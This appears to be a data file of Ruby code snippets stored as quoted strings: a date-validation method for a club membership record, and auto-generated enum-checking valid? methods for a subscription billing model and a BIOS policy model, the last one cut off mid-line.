"def validates_dates\n ( Date.parse(self['birth_date']) rescue errors.add(:birth_date, 'invalid.date') ) if !self['birth_date'].blank?\n ( Date.parse(self['ffck_number_date']) rescue errors.add(:ffck_number_date, 'invalid.date') ) if !self['ffck_number_date'].blank?\n ( Date.parse(self['medical_certificate_date']) rescue errors.add(:medical_certificate_date, 'invalid.date') ) if !self['medical_certificate_date'].blank?\n ( Date.parse(self['tetanus_vaccine_date']) rescue errors.add(:tetanus_vaccine_date, 'invalid.date') ) if !self['tetanus_vaccine_date'].blank?\n end",
"def valid?\n return false if @id.nil?\n return false if @account_id.nil?\n return false if @organization_id.nil?\n return false if @product_id.nil?\n return false if @product_rate_plan_id.nil?\n return false if @name.nil?\n type_validator = EnumAttributeValidator.new('String', [\"Subscription\", \"FixedTerm\", \"Trial\"])\n return false unless type_validator.valid?(@type)\n return false if @state.nil?\n state_validator = EnumAttributeValidator.new('String', [\"Trial\", \"Provisioned\", \"Paid\", \"AwaitingPayment\", \"Cancelled\", \"Failed\", \"Expired\"])\n return false unless state_validator.valid?(@state)\n return false if @initial_period_start.nil?\n return false if @trial_end.nil?\n managed_by_validator = EnumAttributeValidator.new('String', [\"BillForward\", \"Stripe\"])\n return false unless managed_by_validator.valid?(@managed_by)\n return false if @version_start.nil?\n return false if @version_number.nil?\n return false if @current_time.nil?\n failed_payment_behaviour_validator = EnumAttributeValidator.new('String', [\"CancelSubscription\", \"None\"])\n return false unless failed_payment_behaviour_validator.valid?(@failed_payment_behaviour)\n return true\n end",
"def valid?\n return false if @class_id.nil?\n class_id_validator = EnumAttributeValidator.new('String', [\"bios.Policy\"])\n return false unless class_id_validator.valid?(@class_id)\n return false if @object_type.nil?\n object_type_validator = EnumAttributeValidator.new('String', [\"bios.Policy\"])\n return false unless object_type_validator.valid?(@object_type)\n acs_control_gpu1state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_gpu1state_validator.valid?(@acs_control_gpu1state)\n acs_control_gpu2state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_gpu2state_validator.valid?(@acs_control_gpu2state)\n acs_control_gpu3state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_gpu3state_validator.valid?(@acs_control_gpu3state)\n acs_control_gpu4state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_gpu4state_validator.valid?(@acs_control_gpu4state)\n acs_control_gpu5state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_gpu5state_validator.valid?(@acs_control_gpu5state)\n acs_control_gpu6state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_gpu6state_validator.valid?(@acs_control_gpu6state)\n acs_control_gpu7state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_gpu7state_validator.valid?(@acs_control_gpu7state)\n acs_control_gpu8state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_gpu8state_validator.valid?(@acs_control_gpu8state)\n acs_control_slot11state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_slot11state_validator.valid?(@acs_control_slot11state)\n acs_control_slot12state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_slot12state_validator.valid?(@acs_control_slot12state)\n acs_control_slot13state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_slot13state_validator.valid?(@acs_control_slot13state)\n acs_control_slot14state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_slot14state_validator.valid?(@acs_control_slot14state)\n adjacent_cache_line_prefetch_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless adjacent_cache_line_prefetch_validator.valid?(@adjacent_cache_line_prefetch)\n advanced_mem_test_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless advanced_mem_test_validator.valid?(@advanced_mem_test)\n all_usb_devices_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless all_usb_devices_validator.valid?(@all_usb_devices)\n altitude_validator = 
EnumAttributeValidator.new('String', [\"platform-default\", \"300-m\", \"900-m\", \"1500-m\", \"3000-m\", \"auto\"])\n return false unless altitude_validator.valid?(@altitude)\n aspm_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"Force L0s\", \"L1 Only\"])\n return false unless aspm_support_validator.valid?(@aspm_support)\n assert_nmi_on_perr_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless assert_nmi_on_perr_validator.valid?(@assert_nmi_on_perr)\n assert_nmi_on_serr_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless assert_nmi_on_serr_validator.valid?(@assert_nmi_on_serr)\n auto_cc_state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless auto_cc_state_validator.valid?(@auto_cc_state)\n autonumous_cstate_enable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless autonumous_cstate_enable_validator.valid?(@autonumous_cstate_enable)\n baud_rate_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"9600\", \"19200\", \"38400\", \"57600\", \"115200\"])\n return false unless baud_rate_validator.valid?(@baud_rate)\n bme_dma_mitigation_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless bme_dma_mitigation_validator.valid?(@bme_dma_mitigation)\n boot_option_num_retry_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"5\", \"13\", \"Infinite\"])\n return false unless boot_option_num_retry_validator.valid?(@boot_option_num_retry)\n boot_option_re_cool_down_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"15\", \"45\", \"90\"])\n return false unless boot_option_re_cool_down_validator.valid?(@boot_option_re_cool_down)\n boot_option_retry_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless boot_option_retry_validator.valid?(@boot_option_retry)\n boot_performance_mode_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Max Efficient\", \"Max Performance\", \"Set by Intel NM\"])\n return false unless boot_performance_mode_validator.valid?(@boot_performance_mode)\n burst_and_postponed_refresh_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless burst_and_postponed_refresh_validator.valid?(@burst_and_postponed_refresh)\n c1auto_demotion_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless c1auto_demotion_validator.valid?(@c1auto_demotion)\n c1auto_un_demotion_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless c1auto_un_demotion_validator.valid?(@c1auto_un_demotion)\n cbs_cmn_apbdis_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"0\", \"1\", \"Auto\"])\n return false unless cbs_cmn_apbdis_validator.valid?(@cbs_cmn_apbdis)\n cbs_cmn_cpu_cpb_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\"])\n return false unless cbs_cmn_cpu_cpb_validator.valid?(@cbs_cmn_cpu_cpb)\n cbs_cmn_cpu_gen_downcore_ctrl_validator = EnumAttributeValidator.new('String', [\"platform-default\", 
\"Auto\", \"FOUR (2 + 2)\", \"FOUR (4 + 0)\", \"SIX (3 + 3)\", \"THREE (3 + 0)\", \"TWO (1 + 1)\", \"TWO (2 + 0)\"])\n return false unless cbs_cmn_cpu_gen_downcore_ctrl_validator.valid?(@cbs_cmn_cpu_gen_downcore_ctrl)\n cbs_cmn_cpu_global_cstate_ctrl_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless cbs_cmn_cpu_global_cstate_ctrl_validator.valid?(@cbs_cmn_cpu_global_cstate_ctrl)\n cbs_cmn_cpu_l1stream_hw_prefetcher_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless cbs_cmn_cpu_l1stream_hw_prefetcher_validator.valid?(@cbs_cmn_cpu_l1stream_hw_prefetcher)\n cbs_cmn_cpu_l2stream_hw_prefetcher_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless cbs_cmn_cpu_l2stream_hw_prefetcher_validator.valid?(@cbs_cmn_cpu_l2stream_hw_prefetcher)\n cbs_cmn_cpu_smee_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless cbs_cmn_cpu_smee_validator.valid?(@cbs_cmn_cpu_smee)\n cbs_cmn_cpu_streaming_stores_ctrl_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless cbs_cmn_cpu_streaming_stores_ctrl_validator.valid?(@cbs_cmn_cpu_streaming_stores_ctrl)\n cbs_cmn_determinism_slider_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Performance\", \"Power\"])\n return false unless cbs_cmn_determinism_slider_validator.valid?(@cbs_cmn_determinism_slider)\n cbs_cmn_efficiency_mode_en_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Enabled\"])\n return false unless cbs_cmn_efficiency_mode_en_validator.valid?(@cbs_cmn_efficiency_mode_en)\n cbs_cmn_fixed_soc_pstate_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"P0\", \"P1\", \"P2\", \"P3\"])\n return false unless cbs_cmn_fixed_soc_pstate_validator.valid?(@cbs_cmn_fixed_soc_pstate)\n cbs_cmn_gnb_nb_iommu_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless cbs_cmn_gnb_nb_iommu_validator.valid?(@cbs_cmn_gnb_nb_iommu)\n cbs_cmn_gnb_smu_df_cstates_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless cbs_cmn_gnb_smu_df_cstates_validator.valid?(@cbs_cmn_gnb_smu_df_cstates)\n cbs_cmn_gnb_smucppc_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless cbs_cmn_gnb_smucppc_validator.valid?(@cbs_cmn_gnb_smucppc)\n cbs_cmn_mem_ctrl_bank_group_swap_ddr4_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless cbs_cmn_mem_ctrl_bank_group_swap_ddr4_validator.valid?(@cbs_cmn_mem_ctrl_bank_group_swap_ddr4)\n cbs_cmn_mem_map_bank_interleave_ddr4_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\"])\n return false unless cbs_cmn_mem_map_bank_interleave_ddr4_validator.valid?(@cbs_cmn_mem_map_bank_interleave_ddr4)\n cbs_cmnc_tdp_ctl_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Manual\"])\n return false unless cbs_cmnc_tdp_ctl_validator.valid?(@cbs_cmnc_tdp_ctl)\n cbs_cpu_ccd_ctrl_ssp_validator = 
EnumAttributeValidator.new('String', [\"platform-default\", \"2 CCDs\", \"3 CCDs\", \"4 CCDs\", \"6 CCDs\", \"Auto\"])\n return false unless cbs_cpu_ccd_ctrl_ssp_validator.valid?(@cbs_cpu_ccd_ctrl_ssp)\n cbs_cpu_core_ctrl_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"FIVE (5 + 0)\", \"FOUR (4 + 0)\", \"ONE (1 + 0)\", \"SEVEN (7 + 0)\", \"SIX (6 + 0)\", \"THREE (3 + 0)\", \"TWO (2 + 0)\"])\n return false unless cbs_cpu_core_ctrl_validator.valid?(@cbs_cpu_core_ctrl)\n cbs_cpu_smt_ctrl_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless cbs_cpu_smt_ctrl_validator.valid?(@cbs_cpu_smt_ctrl)\n cbs_dbg_cpu_snp_mem_cover_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Custom\", \"disabled\", \"enabled\"])\n return false unless cbs_dbg_cpu_snp_mem_cover_validator.valid?(@cbs_dbg_cpu_snp_mem_cover)\n return false if !@cbs_dbg_cpu_snp_mem_size_cover.nil? && @cbs_dbg_cpu_snp_mem_size_cover !~ Regexp.new(/^(\\d|[1-9]\\d|[1-9]\\d{2}|[1-9]\\d{3}|[1-9]\\d{4}|[1-9]\\d{5}|10[0-3]\\d{4}|104[0-7]\\d{3}|1048[0-4]\\d{2}|10485[0-6]\\d|104857[0-6])$|^(platform-default)$/)\n cbs_df_cmn_acpi_srat_l3numa_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless cbs_df_cmn_acpi_srat_l3numa_validator.valid?(@cbs_df_cmn_acpi_srat_l3numa)\n cbs_df_cmn_dram_nps_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"NPS0\", \"NPS1\", \"NPS2\", \"NPS4\"])\n return false unless cbs_df_cmn_dram_nps_validator.valid?(@cbs_df_cmn_dram_nps)\n cbs_df_cmn_mem_intlv_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Channel\", \"Die\", \"None\", \"Socket\"])\n return false unless cbs_df_cmn_mem_intlv_validator.valid?(@cbs_df_cmn_mem_intlv)\n cbs_df_cmn_mem_intlv_size_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"256 Bytes\", \"512 Bytes\", \"1 KB\", \"2 KB\", \"4 KB\", \"Auto\"])\n return false unless cbs_df_cmn_mem_intlv_size_validator.valid?(@cbs_df_cmn_mem_intlv_size)\n cbs_sev_snp_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless cbs_sev_snp_support_validator.valid?(@cbs_sev_snp_support)\n cdn_enable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless cdn_enable_validator.valid?(@cdn_enable)\n cdn_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"LOMs Only\"])\n return false unless cdn_support_validator.valid?(@cdn_support)\n channel_inter_leave_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"1-way\", \"2-way\", \"3-way\", \"4-way\", \"auto\"])\n return false unless channel_inter_leave_validator.valid?(@channel_inter_leave)\n cisco_adaptive_mem_training_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless cisco_adaptive_mem_training_validator.valid?(@cisco_adaptive_mem_training)\n cisco_debug_level_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Maximum\", \"Minimum\", \"Normal\"])\n return false unless cisco_debug_level_validator.valid?(@cisco_debug_level)\n cisco_oprom_launch_optimization_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n 
return false unless cisco_oprom_launch_optimization_validator.valid?(@cisco_oprom_launch_optimization)\n cisco_xgmi_max_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless cisco_xgmi_max_speed_validator.valid?(@cisco_xgmi_max_speed)\n cke_low_policy_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"auto\", \"disabled\", \"fast\", \"slow\"])\n return false unless cke_low_policy_validator.valid?(@cke_low_policy)\n closed_loop_therm_throtl_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless closed_loop_therm_throtl_validator.valid?(@closed_loop_therm_throtl)\n cmci_enable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless cmci_enable_validator.valid?(@cmci_enable)\n config_tdp_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless config_tdp_validator.valid?(@config_tdp)\n config_tdp_level_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Level 1\", \"Level 2\", \"Normal\"])\n return false unless config_tdp_level_validator.valid?(@config_tdp_level)\n console_redirection_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"com-0\", \"com-1\", \"disabled\", \"enabled\", \"serial-port-a\"])\n return false unless console_redirection_validator.valid?(@console_redirection)\n core_multi_processing_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"11\", \"12\", \"13\", \"14\", \"15\", \"16\", \"17\", \"18\", \"19\", \"20\", \"21\", \"22\", \"23\", \"24\", \"25\", \"26\", \"27\", \"28\", \"29\", \"30\", \"31\", \"32\", \"33\", \"34\", \"35\", \"36\", \"37\", \"38\", \"39\", \"40\", \"41\", \"42\", \"43\", \"44\", \"45\", \"46\", \"47\", \"48\", \"all\"])\n return false unless core_multi_processing_validator.valid?(@core_multi_processing)\n cpu_energy_performance_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"balanced-energy\", \"balanced-performance\", \"balanced-power\", \"energy-efficient\", \"performance\", \"power\"])\n return false unless cpu_energy_performance_validator.valid?(@cpu_energy_performance)\n cpu_frequency_floor_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless cpu_frequency_floor_validator.valid?(@cpu_frequency_floor)\n cpu_perf_enhancement_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\"])\n return false unless cpu_perf_enhancement_validator.valid?(@cpu_perf_enhancement)\n cpu_performance_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"custom\", \"enterprise\", \"high-throughput\", \"hpc\"])\n return false unless cpu_performance_validator.valid?(@cpu_performance)\n cpu_power_management_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"custom\", \"disabled\", \"energy-efficient\", \"performance\"])\n return false unless cpu_power_management_validator.valid?(@cpu_power_management)\n cr_qos_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Disabled\", \"Mode 0 - Disable the PMem QoS Feature\", \"Mode 1 - M2M QoS Enable and CHA QoS Disable\", \"Mode 2 - M2M QoS Enable and CHA QoS Enable\", \"Recipe 1\", \"Recipe 2\", \"Recipe 
3\"])\n return false unless cr_qos_validator.valid?(@cr_qos)\n crfastgo_config_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Default\", \"Disable optimization\", \"Enable optimization\", \"Option 1\", \"Option 2\", \"Option 3\", \"Option 4\", \"Option 5\"])\n return false unless crfastgo_config_validator.valid?(@crfastgo_config)\n dcpmm_firmware_downgrade_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless dcpmm_firmware_downgrade_validator.valid?(@dcpmm_firmware_downgrade)\n demand_scrub_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless demand_scrub_validator.valid?(@demand_scrub)\n direct_cache_access_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"auto\", \"disabled\", \"enabled\"])\n return false unless direct_cache_access_validator.valid?(@direct_cache_access)\n dram_clock_throttling_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Balanced\", \"Energy Efficient\", \"Performance\"])\n return false unless dram_clock_throttling_validator.valid?(@dram_clock_throttling)\n dram_refresh_rate_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"1x\", \"2x\", \"3x\", \"4x\", \"Auto\"])\n return false unless dram_refresh_rate_validator.valid?(@dram_refresh_rate)\n dram_sw_thermal_throttling_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless dram_sw_thermal_throttling_validator.valid?(@dram_sw_thermal_throttling)\n eadr_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless eadr_support_validator.valid?(@eadr_support)\n edpc_en_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Disabled\", \"On Fatal Error\", \"On Fatal and Non-Fatal Errors\"])\n return false unless edpc_en_validator.valid?(@edpc_en)\n enable_clock_spread_spec_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless enable_clock_spread_spec_validator.valid?(@enable_clock_spread_spec)\n enable_mktme_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless enable_mktme_validator.valid?(@enable_mktme)\n enable_sgx_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless enable_sgx_validator.valid?(@enable_sgx)\n enable_tme_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless enable_tme_validator.valid?(@enable_tme)\n energy_efficient_turbo_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless energy_efficient_turbo_validator.valid?(@energy_efficient_turbo)\n eng_perf_tuning_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"BIOS\", \"OS\"])\n return false unless eng_perf_tuning_validator.valid?(@eng_perf_tuning)\n enhanced_intel_speed_step_tech_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless enhanced_intel_speed_step_tech_validator.valid?(@enhanced_intel_speed_step_tech)\n epoch_update_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Change to New 
Random Owner EPOCHs\", \"Manual User Defined Owner EPOCHs\", \"SGX Owner EPOCH activated\"])\n return false unless epoch_update_validator.valid?(@epoch_update)\n epp_enable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless epp_enable_validator.valid?(@epp_enable)\n epp_profile_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Balanced Performance\", \"Balanced Power\", \"Performance\", \"Power\"])\n return false unless epp_profile_validator.valid?(@epp_profile)\n execute_disable_bit_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless execute_disable_bit_validator.valid?(@execute_disable_bit)\n extended_apic_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"X2APIC\", \"XAPIC\"])\n return false unless extended_apic_validator.valid?(@extended_apic)\n flow_control_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"none\", \"rts-cts\"])\n return false unless flow_control_validator.valid?(@flow_control)\n frb2enable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless frb2enable_validator.valid?(@frb2enable)\n hardware_prefetch_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless hardware_prefetch_validator.valid?(@hardware_prefetch)\n hwpm_enable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Disabled\", \"HWPM Native Mode\", \"HWPM OOB Mode\", \"NATIVE MODE\", \"Native Mode with no Legacy\", \"OOB MODE\"])\n return false unless hwpm_enable_validator.valid?(@hwpm_enable)\n imc_interleave_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"1-way Interleave\", \"2-way Interleave\", \"Auto\"])\n return false unless imc_interleave_validator.valid?(@imc_interleave)\n intel_dynamic_speed_select_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless intel_dynamic_speed_select_validator.valid?(@intel_dynamic_speed_select)\n intel_hyper_threading_tech_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless intel_hyper_threading_tech_validator.valid?(@intel_hyper_threading_tech)\n intel_speed_select_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Base\", \"Config 1\", \"Config 2\", \"Config 3\", \"Config 4\"])\n return false unless intel_speed_select_validator.valid?(@intel_speed_select)\n intel_turbo_boost_tech_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless intel_turbo_boost_tech_validator.valid?(@intel_turbo_boost_tech)\n intel_virtualization_technology_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless intel_virtualization_technology_validator.valid?(@intel_virtualization_technology)\n intel_vt_for_directed_io_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless intel_vt_for_directed_io_validator.valid?(@intel_vt_for_directed_io)\n intel_vtd_coherency_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless 
intel_vtd_coherency_support_validator.valid?(@intel_vtd_coherency_support)\n intel_vtd_interrupt_remapping_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless intel_vtd_interrupt_remapping_validator.valid?(@intel_vtd_interrupt_remapping)\n intel_vtd_pass_through_dma_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless intel_vtd_pass_through_dma_support_validator.valid?(@intel_vtd_pass_through_dma_support)\n intel_vtdats_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless intel_vtdats_support_validator.valid?(@intel_vtdats_support)\n ioh_error_enable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"No\", \"Yes\"])\n return false unless ioh_error_enable_validator.valid?(@ioh_error_enable)\n ioh_resource_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"IOH0 24k IOH1 40k\", \"IOH0 32k IOH1 32k\", \"IOH0 40k IOH1 24k\", \"IOH0 48k IOH1 16k\", \"IOH0 56k IOH1 8k\"])\n return false unless ioh_resource_validator.valid?(@ioh_resource)\n ip_prefetch_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless ip_prefetch_validator.valid?(@ip_prefetch)\n ipv4http_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless ipv4http_validator.valid?(@ipv4http)\n ipv4pxe_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless ipv4pxe_validator.valid?(@ipv4pxe)\n ipv6http_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless ipv6http_validator.valid?(@ipv6http)\n ipv6pxe_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless ipv6pxe_validator.valid?(@ipv6pxe)\n kti_prefetch_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless kti_prefetch_validator.valid?(@kti_prefetch)\n legacy_os_redirection_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless legacy_os_redirection_validator.valid?(@legacy_os_redirection)\n legacy_usb_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"auto\", \"disabled\", \"enabled\"])\n return false unless legacy_usb_support_validator.valid?(@legacy_usb_support)\n llc_alloc_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless llc_alloc_validator.valid?(@llc_alloc)\n llc_prefetch_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless llc_prefetch_validator.valid?(@llc_prefetch)\n lom_port0state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless lom_port0state_validator.valid?(@lom_port0state)\n lom_port1state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless lom_port1state_validator.valid?(@lom_port1state)\n lom_port2state_validator = EnumAttributeValidator.new('String', 
[\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless lom_port2state_validator.valid?(@lom_port2state)\n lom_port3state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless lom_port3state_validator.valid?(@lom_port3state)\n lom_ports_all_state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless lom_ports_all_state_validator.valid?(@lom_ports_all_state)\n lv_ddr_mode_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"auto\", \"performance-mode\", \"power-saving-mode\"])\n return false unless lv_ddr_mode_validator.valid?(@lv_ddr_mode)\n make_device_non_bootable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless make_device_non_bootable_validator.valid?(@make_device_non_bootable)\n memory_bandwidth_boost_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless memory_bandwidth_boost_validator.valid?(@memory_bandwidth_boost)\n memory_inter_leave_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"1 Way Node Interleave\", \"2 Way Node Interleave\", \"4 Way Node Interleave\", \"8 Way Node Interleave\", \"disabled\", \"enabled\"])\n return false unless memory_inter_leave_validator.valid?(@memory_inter_leave)\n memory_mapped_io_above4gb_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless 